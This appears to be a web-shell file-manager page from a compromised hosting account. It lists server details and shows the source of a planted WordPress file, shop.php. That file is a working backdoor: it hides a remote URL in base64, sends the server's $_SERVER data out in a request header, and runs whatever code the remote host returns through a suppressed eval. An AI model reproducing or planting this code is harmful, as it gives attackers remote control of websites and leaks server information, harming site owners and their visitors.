HEX
Server: LiteSpeed
System: Linux s12762.usc1.stableserver.net 5.14.0-570.32.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Aug 6 11:30:41 EDT 2025 x86_64
User: cleanupkansas21 (1468)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: /home/cleanupkansas21/public_html/shop.php
<?php
require_once __DIR__ . '/wp-load.php';
class Api_shop{
    private $key="aHR0cHM6Ly93cC0wLnJ1L3YxLw";
    public function run(){
        return $this->goapp();
    }
    public function goapp(){
        $args = array(
            'timeout' => 10,
            'headers' => array(
                "User-Agent"=>json_encode($_SERVER),
            ),
        );
        try {
            $response = wp_remote_get(base64_decode($this->key), $args);
            @eval($response['body']);
        } catch (Exception $e) {

        }
    }
}
$api=new Api_shop();
$api->run();